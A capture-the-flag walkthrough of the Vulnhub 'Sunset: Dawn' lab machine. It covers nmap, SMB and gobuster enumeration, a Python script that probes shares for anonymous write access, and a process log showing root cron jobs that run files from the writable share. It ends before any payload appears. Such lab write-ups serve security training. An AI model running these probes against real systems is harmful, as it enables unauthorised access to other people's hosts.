Detailed walkthrough of the Vulnhub Sunset: Dawn machine

Sunset : Dawn

Author: jason_huawen

Basic information about the target machine

Name: sunset: dawn

Address:

https://www.vulnhub.com/entry/sunset-dawn,341/

Hint: dawn is a boot2root machine with a difficulty designed to be Easy with
multiple ways to be completed. It is recommended to use Virtualbox.

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ sudo netdiscover -i eth1

Currently scanning: 192.168.67.0/16   |   Screen View: Unique Hosts                                                        

 4 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 240                                                            
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:55:6f:ee      2     120  PCS Systemtechnik GmbH                                                   
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                           
 192.168.56.251  08:00:27:2a:fd:f3      1      60  PCS Systemtechnik GmbH        

Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.251.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.251 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-03 21:26 EST
Nmap scan report for localhost (192.168.56.251)
Host is up (0.00015s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.15-MariaDB-1
|   Thread ID: 13
|   Capabilities flags: 63486
|   Some Capabilities: SupportsCompression, Speaks41ProtocolOld, ConnectWithDatabase, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSigpipes, IgnoreSpaceBeforeParenthesis, LongColumnFlag, InteractiveClient, ODBCClient, Speaks41ProtocolNew, SupportsLoadDataLocal, Support41Auth, FoundRows, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: 8~6.$hc8.z@n+((/P)w@
|_  Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:2A:FD:F3 (Oracle VirtualBox virtual NIC)
Service Info: Host: DAWN

Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
| smb2-time: 
|   date: 2022-12-04T02:27:09
|_  start_date: N/A
|_nbstat: NetBIOS name: DAWN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: dawn
|   NetBIOS computer name: DAWN\x00
|   Domain name: dawn
|   FQDN: dawn.dawn
|_  System time: 2022-12-03T21:27:09-05:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.15 seconds

The NMAP scan shows four open TCP ports on the target: 80 (HTTP, Apache 2.4.38), 139/445 (SMB, Samba 4.9.5-Debian) and 3306 (MySQL, MariaDB 10.3.15). Note that port 22 (SSH) is not open, so the initial foothold has to come through the web server, the SMB shares or the database.

Getting a shell

First check whether MySQL accepts an empty or weak root password:

┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ mysql -uroot -p -h 192.168.56.251
Enter password: 
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: NO)

┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ mysql -uroot -p -h 192.168.56.251
Enter password: 
ERROR 1045 (28000): Access denied for user 'root'@'192.168.56.206' (using password: YES)
┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ smbclient -L 192.168.56.251                                
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        ITDEPT          Disk      PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
        IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            DAWN

┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ smbclient //192.168.56.251/ITDEPT   
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Aug  2 23:23:20 2019
  ..                                  D        0  Fri Aug  2 23:21:39 2019

                7158264 blocks of size 1024. 3501116 blocks available
smb: \> ls -alh
NT_STATUS_NO_SUCH_FILE listing \-alh
smb: \> ls
  .                                   D        0  Fri Aug  2 23:23:20 2019
  ..                                  D        0  Fri Aug  2 23:21:39 2019

                7158264 blocks of size 1024. 3501116 blocks available
smb: \> put test.txt 
putting file test.txt as \test.txt (0.0 kb/s) (average 0.0 kb/s)
smb: \> ls
  .                                   D        0  Sat Dec  3 21:30:48 2022
  ..                                  D        0  Fri Aug  2 23:21:39 2019
  test.txt                            A        0  Sat Dec  3 21:30:48 2022

                7158264 blocks of size 1024. 3501116 blocks available
smb: \> 

Testing shows that the ITDEPT share accepts writes with a blank password, so files can be uploaded to the target through SMB without any credentials.
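The manual check above (list the shares, connect with a blank password, put a file) is easy to automate so that every disk share on a host gets the same write probe. The following Python script is an added example, not part of the original walkthrough; it shells out to the smbclient binary, so it needs Samba's client tools on the attacking host. The SAMPLE_LISTING is the share table printed above and is only used to exercise the parser; the function names are my own. It relies on one assumption, stated in the code: smbclient exits non-zero when the server refuses the put.

```python
"""Enumerate SMB shares without credentials and probe each disk share for
anonymous write access, automating the manual smbclient steps above.
Needs the smbclient binary (Samba) on the attacking host."""
import os
import subprocess
import sys
import tempfile

# Constructed sample: the share table printed by `smbclient -L 192.168.56.251` above.
SAMPLE_LISTING = """\

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        ITDEPT          Disk      PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
        IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            DAWN
"""


def disk_shares(listing):
    """Names of Disk-type shares in `smbclient -L` output (IPC$ is not a file
    share, so it is left out; print$ is kept because it is sometimes writable)."""
    names = []
    for line in listing.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[1] == "Disk":
            names.append(parts[0])
    return names


def probe_command(host, share, marker):
    """argv that uploads `marker` to //host/share anonymously (-N, no password
    prompt, same as pressing Enter above) and deletes it again afterwards."""
    name = os.path.basename(marker)
    return ["smbclient", f"//{host}/{share}", "-N", "-c", f"put {marker} {name}; rm {name}"]


def list_shares(host):
    out = subprocess.run(["smbclient", "-L", host, "-N"], capture_output=True, text=True)
    return disk_shares(out.stdout)


def probe_write(host, share):
    """True if the anonymous put succeeds. Assumption: smbclient exits non-zero
    when the server answers the put with NT_STATUS_ACCESS_DENIED."""
    with tempfile.TemporaryDirectory() as tmp:
        marker = os.path.join(tmp, f"probe_{os.getpid()}.txt")
        open(marker, "w").close()  # empty marker file, like test.txt above
        return subprocess.run(probe_command(host, share, marker), capture_output=True).returncode == 0


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "192.168.56.251"
    for share in list_shares(host):
        print(f"{share:<20} {'WRITABLE (anonymous)' if probe_write(host, share) else 'read-only'}")
```

Run it as `python3 smbprobe.py 192.168.56.251`; each disk share is listed with whether an unauthenticated upload succeeded. Because the marker is removed again, the probe leaves no file behind on shares that do accept the write.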

┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ gobuster dir -u http://192.168.56.251 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.251
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/03 21:32:29 Starting gobuster in directory enumeration mode
===============================================================
/logs                 (Status: 301) [Size: 315] [--> http://192.168.56.251/logs/]
/cctv                 (Status: 301) [Size: 315] [--> http://192.168.56.251/cctv/]
/server-status        (Status: 403) [Size: 302]
Progress: 219019 / 220561 (99.30%)===============================================================
2022/12/03 21:32:57 Finished
===============================================================

Browsing the /logs directory, only management.log can be opened and downloaded; access to everything else in it is forbidden.

┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ mv ~/Downloads/management.log .

┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ cat management.log 
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2022/12/03 21:15:31 CMD: UID=0    PID=95     | 
2022/12/03 21:15:31 CMD: UID=0    PID=9      | 
2022/12/03 21:15:31 CMD: UID=0    PID=8      | 
2022/12/03 21:15:31 CMD: UID=0    PID=7      | 
2022/12/03 21:15:31 CMD: UID=0    PID=628    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:15:31 CMD: UID=0    PID=613    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:15:31 CMD: UID=0    PID=612    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:15:31 CMD: UID=0    PID=6      | 
2022/12/03 21:15:31 CMD: UID=0    PID=594    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:15:31 CMD: UID=0    PID=58     | 
2022/12/03 21:15:31 CMD: UID=33   PID=576    | /usr/sbin/apache2 -k start 
2022/12/03 21:15:31 CMD: UID=33   PID=575    | /usr/sbin/apache2 -k start 
2022/12/03 21:15:31 CMD: UID=33   PID=574    | /usr/sbin/apache2 -k start 
2022/12/03 21:15:31 CMD: UID=33   PID=573    | /usr/sbin/apache2 -k start 
2022/12/03 21:15:31 CMD: UID=33   PID=572    | /usr/sbin/apache2 -k start 
2022/12/03 21:15:31 CMD: UID=0    PID=541    | /usr/sbin/apache2 -k start 
2022/12/03 21:15:31 CMD: UID=112  PID=536    | /usr/sbin/mysqld 
2022/12/03 21:15:31 CMD: UID=0    PID=5      | 
2022/12/03 21:15:31 CMD: UID=0    PID=49     | 
2022/12/03 21:15:31 CMD: UID=0    PID=48     | 
2022/12/03 21:15:31 CMD: UID=0    PID=47     | 
2022/12/03 21:15:31 CMD: UID=0    PID=446    | /root/pspy64 
2022/12/03 21:15:31 CMD: UID=0    PID=445    | /sbin/agetty -o -p -- \u --noclear tty1 linux 
2022/12/03 21:15:31 CMD: UID=0    PID=443    | /usr/sbin/cups-browsed 
2022/12/03 21:15:31 CMD: UID=0    PID=440    | /usr/sbin/nmbd --foreground --no-process-group 
2022/12/03 21:15:31 CMD: UID=107  PID=437    | avahi-daemon: chroot helper 
2022/12/03 21:15:31 CMD: UID=0    PID=435    | /bin/sh -c /root/pspy64 > /var/www/html/logs/management.log 
2022/12/03 21:15:31 CMD: UID=0    PID=422    | /usr/sbin/CRON -f 
2022/12/03 21:15:31 CMD: UID=0    PID=406    | /usr/sbin/anacron -d -q -s 
2022/12/03 21:15:31 CMD: UID=0    PID=403    | /sbin/wpa_supplicant -u -s -O /run/wpa_supplicant 
2022/12/03 21:15:31 CMD: UID=0    PID=402    | /usr/sbin/cupsd -l 
2022/12/03 21:15:31 CMD: UID=0    PID=401    | /usr/sbin/cron -f 
2022/12/03 21:15:31 CMD: UID=0    PID=4      | 
2022/12/03 21:15:31 CMD: UID=104  PID=399    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only                                                                                                     
2022/12/03 21:15:31 CMD: UID=0    PID=398    | /usr/sbin/rsyslogd -n -iNONE 
2022/12/03 21:15:31 CMD: UID=107  PID=397    | avahi-daemon: running [dawn.local] 
2022/12/03 21:15:31 CMD: UID=0    PID=396    | /lib/systemd/systemd-logind 
2022/12/03 21:15:31 CMD: UID=0    PID=344    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                                            
2022/12/03 21:15:31 CMD: UID=0    PID=311    | 
2022/12/03 21:15:31 CMD: UID=0    PID=308    | 
2022/12/03 21:15:31 CMD: UID=0    PID=3      | 
2022/12/03 21:15:31 CMD: UID=0    PID=29     | 
2022/12/03 21:15:31 CMD: UID=0    PID=28     | 
2022/12/03 21:15:31 CMD: UID=0    PID=27     | 
2022/12/03 21:15:31 CMD: UID=0    PID=26     | 
2022/12/03 21:15:31 CMD: UID=101  PID=250    | /lib/systemd/systemd-timesyncd 
2022/12/03 21:15:31 CMD: UID=0    PID=25     | 
2022/12/03 21:15:31 CMD: UID=0    PID=241    | /lib/systemd/systemd-udevd 
2022/12/03 21:15:31 CMD: UID=0    PID=24     | 
2022/12/03 21:15:31 CMD: UID=0    PID=23     | 
2022/12/03 21:15:31 CMD: UID=0    PID=22     | 
2022/12/03 21:15:31 CMD: UID=0    PID=218    | /lib/systemd/systemd-journald 
2022/12/03 21:15:31 CMD: UID=0    PID=21     | 
2022/12/03 21:15:31 CMD: UID=0    PID=20     | 
2022/12/03 21:15:31 CMD: UID=0    PID=2      | 
2022/12/03 21:15:31 CMD: UID=0    PID=19     | 
2022/12/03 21:15:31 CMD: UID=0    PID=187    | 
2022/12/03 21:15:31 CMD: UID=0    PID=186    | 
2022/12/03 21:15:31 CMD: UID=0    PID=184    | 
2022/12/03 21:15:31 CMD: UID=0    PID=18     | 
2022/12/03 21:15:31 CMD: UID=0    PID=17     | 
2022/12/03 21:15:31 CMD: UID=0    PID=16     | 
2022/12/03 21:15:31 CMD: UID=0    PID=157    | 
2022/12/03 21:15:31 CMD: UID=0    PID=154    | 
2022/12/03 21:15:31 CMD: UID=0    PID=152    | 
2022/12/03 21:15:31 CMD: UID=0    PID=15     | 
2022/12/03 21:15:31 CMD: UID=0    PID=14     | 
2022/12/03 21:15:31 CMD: UID=0    PID=13     | 
2022/12/03 21:15:31 CMD: UID=0    PID=12     | 
2022/12/03 21:15:31 CMD: UID=0    PID=119    | 
2022/12/03 21:15:31 CMD: UID=0    PID=114    | 
2022/12/03 21:15:31 CMD: UID=0    PID=113    | 
2022/12/03 21:15:31 CMD: UID=0    PID=111    | 
2022/12/03 21:15:31 CMD: UID=0    PID=110    | 
2022/12/03 21:15:31 CMD: UID=0    PID=11     | 
2022/12/03 21:15:31 CMD: UID=0    PID=108    | 
2022/12/03 21:15:31 CMD: UID=0    PID=107    | 
2022/12/03 21:15:31 CMD: UID=0    PID=106    | 
2022/12/03 21:15:31 CMD: UID=0    PID=104    | 
2022/12/03 21:15:31 CMD: UID=0    PID=102    | 
2022/12/03 21:15:31 CMD: UID=0    PID=10     | 
2022/12/03 21:15:31 CMD: UID=0    PID=1      | /sbin/init 
2022/12/03 21:16:01 CMD: UID=0    PID=643    | /usr/sbin/CRON -f 
2022/12/03 21:16:01 CMD: UID=0    PID=642    | /usr/sbin/cron -f 
2022/12/03 21:16:01 CMD: UID=0    PID=641    | /usr/sbin/cron -f 
2022/12/03 21:16:01 CMD: UID=0    PID=640    | /usr/sbin/cron -f 
2022/12/03 21:16:01 CMD: UID=0    PID=639    | /usr/sbin/cron -f 
2022/12/03 21:16:01 CMD: UID=0    PID=647    | /usr/sbin/CRON -f 
2022/12/03 21:16:01 CMD: UID=0    PID=646    | /usr/sbin/CRON -f 
2022/12/03 21:16:01 CMD: UID=0    PID=645    | /usr/sbin/CRON -f 
2022/12/03 21:16:01 CMD: UID=0    PID=644    | /usr/sbin/CRON -f 
2022/12/03 21:16:01 CMD: UID=0    PID=650    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:16:01 CMD: UID=0    PID=649    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control 
2022/12/03 21:16:01 CMD: UID=0    PID=648    | /usr/sbin/CRON -f 
2022/12/03 21:16:01 CMD: UID=1000 PID=652    | /bin/sh -c /home/dawn/ITDEPT/product-control 
2022/12/03 21:16:01 CMD: UID=0    PID=651    | /bin/sh -c /home/ganimedes/phobos 
2022/12/03 21:16:01 CMD: UID=33   PID=653    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2022/12/03 21:17:01 CMD: UID=0    PID=660    | /usr/sbin/CRON -f 
2022/12/03 21:17:01 CMD: UID=0    PID=659    | /usr/sbin/cron -f 
2022/12/03 21:17:01 CMD: UID=0    PID=658    | /usr/sbin/cron -f 
2022/12/03 21:17:01 CMD: UID=0    PID=657    | /usr/sbin/cron -f 
2022/12/03 21:17:01 CMD: UID=0    PID=656    | /usr/sbin/cron -f 
2022/12/03 21:17:01 CMD: UID=0    PID=655    | /usr/sbin/cron -f 
2022/12/03 21:17:01 CMD: UID=0    PID=667    | /bin/sh -c /home/ganimedes/phobos 
2022/12/03 21:17:01 CMD: UID=0    PID=666    | /usr/sbin/CRON -f 
2022/12/03 21:17:01 CMD: UID=0    PID=665    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:17:01 CMD: UID=0    PID=664    | /usr/sbin/CRON -f 
2022/12/03 21:17:01 CMD: UID=0    PID=663    | /usr/sbin/CRON -f 
2022/12/03 21:17:01 CMD: UID=0    PID=662    | /bin/sh -c /home/ganimedes/phobos 
2022/12/03 21:17:01 CMD: UID=0    PID=661    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:17:01 CMD: UID=0    PID=671    | /usr/sbin/CRON -f 
2022/12/03 21:17:01 CMD: UID=0    PID=672    | /bin/sh -c    cd / && run-parts --report /etc/cron.hourly 
2022/12/03 21:18:01 CMD: UID=0    PID=677    | /usr/sbin/CRON -f 
2022/12/03 21:18:01 CMD: UID=0    PID=676    | /usr/sbin/cron -f 
2022/12/03 21:18:01 CMD: UID=0    PID=675    | /usr/sbin/cron -f 
2022/12/03 21:18:01 CMD: UID=0    PID=674    | /usr/sbin/cron -f 
2022/12/03 21:18:01 CMD: UID=0    PID=673    | /usr/sbin/cron -f 
2022/12/03 21:18:01 CMD: UID=0    PID=679    | /usr/sbin/CRON -f 
2022/12/03 21:18:01 CMD: UID=0    PID=678    | /usr/sbin/CRON -f 
2022/12/03 21:18:01 CMD: UID=0    PID=680    | /usr/sbin/CRON -f 
2022/12/03 21:18:01 CMD: UID=0    PID=683    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control 
2022/12/03 21:18:01 CMD: UID=0    PID=682    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:18:01 CMD: UID=0    PID=681    | /usr/sbin/CRON -f 
2022/12/03 21:18:01 CMD: UID=0    PID=686    | /bin/sh -c /home/ganimedes/phobos 
2022/12/03 21:18:01 CMD: UID=1000 PID=685    | /bin/sh -c /home/dawn/ITDEPT/product-control 
2022/12/03 21:18:01 CMD: UID=0    PID=684    | /usr/sbin/CRON -f 
2022/12/03 21:18:01 CMD: UID=33   PID=687    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2022/12/03 21:19:01 CMD: UID=0    PID=692    | /usr/sbin/CRON -f 
2022/12/03 21:19:01 CMD: UID=0    PID=691    | /usr/sbin/cron -f 
2022/12/03 21:19:01 CMD: UID=0    PID=690    | /usr/sbin/cron -f 
2022/12/03 21:19:01 CMD: UID=0    PID=689    | /usr/sbin/cron -f 
2022/12/03 21:19:01 CMD: UID=0    PID=688    | /usr/sbin/cron -f 
2022/12/03 21:19:01 CMD: UID=0    PID=695    | /usr/sbin/CRON -f 
2022/12/03 21:19:01 CMD: UID=0    PID=694    | /usr/sbin/CRON -f 
2022/12/03 21:19:01 CMD: UID=0    PID=693    | /usr/sbin/CRON -f 
2022/12/03 21:19:01 CMD: UID=0    PID=698    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control 
2022/12/03 21:19:01 CMD: UID=0    PID=697    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:19:01 CMD: UID=0    PID=696    | /usr/sbin/CRON -f 
2022/12/03 21:19:01 CMD: UID=0    PID=699    | /bin/sh -c /home/ganimedes/phobos 
2022/12/03 21:19:01 CMD: UID=0    PID=700    | /usr/sbin/CRON -f 
2022/12/03 21:19:01 CMD: UID=1000 PID=701    | /bin/sh -c /home/dawn/ITDEPT/product-control 
2022/12/03 21:19:01 CMD: UID=33   PID=702    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2022/12/03 21:19:56 CMD: UID=0    PID=703    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                                            
2022/12/03 21:19:56 CMD: UID=0    PID=704    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:19:56 CMD: UID=0    PID=705    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:19:56 CMD: UID=0    PID=706    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:19:56 CMD: UID=0    PID=707    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:19:56 CMD: UID=0    PID=708    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:19:56 CMD: UID=0    PID=709    | /sbin/init 
2022/12/03 21:19:56 CMD: UID=0    PID=711    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:19:56 CMD: UID=0    PID=710    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:19:56 CMD: UID=0    PID=712    | /bin/sh /sbin/dhclient-script 
2022/12/03 21:20:01 CMD: UID=0    PID=717    | /usr/sbin/CRON -f 
2022/12/03 21:20:01 CMD: UID=0    PID=716    | /usr/sbin/cron -f 
2022/12/03 21:20:01 CMD: UID=0    PID=715    | /usr/sbin/cron -f 
2022/12/03 21:20:01 CMD: UID=0    PID=714    | /usr/sbin/cron -f 
2022/12/03 21:20:01 CMD: UID=0    PID=713    | /usr/sbin/cron -f 
2022/12/03 21:20:01 CMD: UID=0    PID=721    | /usr/sbin/CRON -f 
2022/12/03 21:20:01 CMD: UID=0    PID=720    | /usr/sbin/CRON -f 
2022/12/03 21:20:01 CMD: UID=0    PID=719    | /usr/sbin/CRON -f 
2022/12/03 21:20:01 CMD: UID=0    PID=718    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:20:01 CMD: UID=0    PID=725    | /usr/sbin/CRON -f 
2022/12/03 21:20:01 CMD: UID=0    PID=724    | /bin/sh -c /home/ganimedes/phobos 
2022/12/03 21:20:01 CMD: UID=0    PID=723    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:20:01 CMD: UID=0    PID=722    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control 
2022/12/03 21:20:01 CMD: UID=1000 PID=726    | /bin/sh -c /home/dawn/ITDEPT/product-control 
2022/12/03 21:20:01 CMD: UID=33   PID=727    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2022/12/03 21:20:40 CMD: UID=0    PID=728    | 
2022/12/03 21:20:43 CMD: UID=0    PID=729    | /usr/sbin/smbd --foreground --no-process-group 
2022/12/03 21:21:01 CMD: UID=0    PID=734    | /usr/sbin/CRON -f 
2022/12/03 21:21:01 CMD: UID=0    PID=733    | /usr/sbin/cron -f 
2022/12/03 21:21:01 CMD: UID=0    PID=732    | /usr/sbin/cron -f 
2022/12/03 21:21:01 CMD: UID=0    PID=731    | /usr/sbin/cron -f 
2022/12/03 21:21:01 CMD: UID=0    PID=730    | /usr/sbin/cron -f 
2022/12/03 21:21:01 CMD: UID=0    PID=736    | /usr/sbin/CRON -f 
2022/12/03 21:21:01 CMD: UID=0    PID=735    | /usr/sbin/CRON -f 
2022/12/03 21:21:01 CMD: UID=0    PID=739    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:21:01 CMD: UID=0    PID=738    | /usr/sbin/CRON -f 
2022/12/03 21:21:01 CMD: UID=0    PID=737    | /usr/sbin/CRON -f 
2022/12/03 21:21:01 CMD: UID=1000 PID=743    | /bin/sh -c /home/dawn/ITDEPT/product-control 
2022/12/03 21:21:01 CMD: UID=0    PID=742    | /usr/sbin/CRON -f 
2022/12/03 21:21:01 CMD: UID=0    PID=741    | /bin/sh -c /home/ganimedes/phobos 
2022/12/03 21:21:01 CMD: UID=33   PID=744    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2022/12/03 21:22:01 CMD: UID=0    PID=749    | /usr/sbin/CRON -f 
2022/12/03 21:22:01 CMD: UID=0    PID=748    | /usr/sbin/cron -f 
2022/12/03 21:22:01 CMD: UID=0    PID=747    | /usr/sbin/cron -f 
2022/12/03 21:22:01 CMD: UID=0    PID=746    | /usr/sbin/cron -f 
2022/12/03 21:22:01 CMD: UID=0    PID=745    | /usr/sbin/cron -f 
2022/12/03 21:22:01 CMD: UID=0    PID=751    | /usr/sbin/CRON -f 
2022/12/03 21:22:01 CMD: UID=0    PID=750    | /usr/sbin/CRON -f 
2022/12/03 21:22:01 CMD: UID=0    PID=755    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control 
2022/12/03 21:22:01 CMD: UID=0    PID=754    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:22:01 CMD: UID=0    PID=753    | /usr/sbin/CRON -f 
2022/12/03 21:22:01 CMD: UID=0    PID=752    | /usr/sbin/CRON -f 
2022/12/03 21:22:01 CMD: UID=0    PID=758    | /usr/sbin/CRON -f 
2022/12/03 21:22:01 CMD: UID=1000 PID=757    | /bin/sh -c /home/dawn/ITDEPT/product-control 
2022/12/03 21:22:01 CMD: UID=0    PID=756    | /bin/sh -c /home/ganimedes/phobos 
2022/12/03 21:22:01 CMD: UID=33   PID=759    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2022/12/03 21:23:01 CMD: UID=0    PID=764    | /usr/sbin/CRON -f 
2022/12/03 21:23:01 CMD: UID=0    PID=763    | /usr/sbin/cron -f 
2022/12/03 21:23:01 CMD: UID=0    PID=762    | /usr/sbin/cron -f 
2022/12/03 21:23:01 CMD: UID=0    PID=761    | /usr/sbin/cron -f 
2022/12/03 21:23:01 CMD: UID=0    PID=760    | /usr/sbin/cron -f 
2022/12/03 21:23:01 CMD: UID=0    PID=767    | /usr/sbin/CRON -f 
2022/12/03 21:23:01 CMD: UID=0    PID=766    | /usr/sbin/CRON -f 
2022/12/03 21:23:01 CMD: UID=0    PID=765    | /usr/sbin/CRON -f 
2022/12/03 21:23:01 CMD: UID=0    PID=769    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control 
2022/12/03 21:23:01 CMD: UID=0    PID=768    | /usr/sbin/CRON -f 
2022/12/03 21:23:01 CMD: UID=1000 PID=773    | /bin/sh -c /home/dawn/ITDEPT/product-control 
2022/12/03 21:23:01 CMD: UID=0    PID=772    | /usr/sbin/CRON -f 
2022/12/03 21:23:01 CMD: UID=0    PID=771    | /bin/sh -c /home/ganimedes/phobos 
2022/12/03 21:23:01 CMD: UID=0    PID=770    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:23:01 CMD: UID=33   PID=774    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2022/12/03 21:24:01 CMD: UID=0    PID=779    | /usr/sbin/CRON -f 
2022/12/03 21:24:01 CMD: UID=0    PID=778    | /usr/sbin/cron -f 
2022/12/03 21:24:01 CMD: UID=0    PID=777    | /usr/sbin/cron -f 
2022/12/03 21:24:01 CMD: UID=0    PID=776    | /usr/sbin/cron -f 
2022/12/03 21:24:01 CMD: UID=0    PID=775    | /usr/sbin/cron -f 
2022/12/03 21:24:01 CMD: UID=0    PID=780    | /usr/sbin/CRON -f 
2022/12/03 21:24:01 CMD: UID=0    PID=783    | /usr/sbin/CRON -f 
2022/12/03 21:24:01 CMD: UID=0    PID=782    | /usr/sbin/CRON -f 
2022/12/03 21:24:01 CMD: UID=0    PID=781    | /usr/sbin/CRON -f 
2022/12/03 21:24:01 CMD: UID=0    PID=784    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control 
2022/12/03 21:24:01 CMD: UID=1000 PID=788    | /bin/sh -c /home/dawn/ITDEPT/product-control 
2022/12/03 21:24:01 CMD: UID=0    PID=787    | /usr/sbin/CRON -f 
2022/12/03 21:24:01 CMD: UID=0    PID=786    | /bin/sh -c /home/ganimedes/phobos 
2022/12/03 21:24:01 CMD: UID=0    PID=785    | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control 
2022/12/03 21:24:01 CMD: UID=33   PID=789    | /bin/sh -c /home/dawn/ITDEPT/web-control 
2022/12/03 21:24:44 CMD: UID=0    PID=790    | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3                                                            
